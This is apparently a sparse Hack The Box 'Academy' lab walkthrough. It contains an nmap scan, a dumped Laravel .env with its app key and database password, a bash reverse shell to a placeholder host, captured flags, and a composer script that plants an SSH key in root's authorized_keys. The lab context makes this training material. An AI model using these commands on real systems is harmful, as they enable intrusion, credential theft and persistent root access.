Academy

# Nmap 7.91 scan initiated Sun Nov 29 13:49:16 2020 as: nmap -sC -sV -Pn -oA Academy 10.10.10.215
Nmap scan report for 10.10.10.215
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE      VERSION
22/tcp open     ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open     http         Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://academy.htb/
88/tcp filtered kerberos-sec
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 29 13:54:29 2020 -- 1 IP address (1 host up) scanned in 312.78 seconds

修改Hosts

10.10.10.215 academy.htb

用户权限

post image

再次修改Hosts

10.10.10.215 academy.htb dev-staging-01.academy.htb

进入http://dev-staging-01.academy.htb

发现关键词Laravel

Command ~> cat /var/www/html/academy/.env

APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null

PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1

MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"

remote
nc -l 1234

local
bash -c 'bash -i >& /dev/tcp/10.10.15.XX/1234 0>&1'

b11122e303dae8ceeee215804f60a119

post image
post image

mrb3n_Ac@d3my!

{
  "scripts": {
    "command": "mkdir /root/.ssh; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTX2FPNH+e2PHPtZIpd6PxXZpZmKySBaSjpEftPu+dEEVRF/CNSn1GWtnCO4YjD0r3scAjMXFMWP0J17ibFR1SQ+x+DHKRubR/sh3ZH2BPr30yYPzC+TXHFELSiEvwllcfTCDTvmUzoposuC4wnuI/eaVDPRBzn3ke9zHI0WgbJxInjTYL2XElRg1NdwsihCK5HBZnfgNIrW8s+5J4G3DgF2Zl+1BOAd+CuNvEGSx/ZZPI2TGClJW1A+rVYJ+U5052kZQMvRzdB53vCagivIRYEkNacz33ztjbzR1sW6f5r7oMrOBw6KO75/8+PlcrvrtpPOX8sniX34C4w/KYooxJDc6HsiGDZHmFUq3eHpRvd6EG1JtPQQroiw+K/ajSORuMzfC+SSFVb8MumxBeI2n9yEmAhYaraAX2ZdP/YX0aQ8X4qddgS+5TPa1SGhhnUJuS0Ke7tX+Xtj/vP3QHcTjUVYj65rdk5iLfyPJZFUuAU+QiCuUfWEtwZy/f636yKhM= xiaming@bixin.cn' >> /root/.ssh/authorized_keys"
  }
}
post image
post image

e8065ea83707204ed3f153f94cbddbb7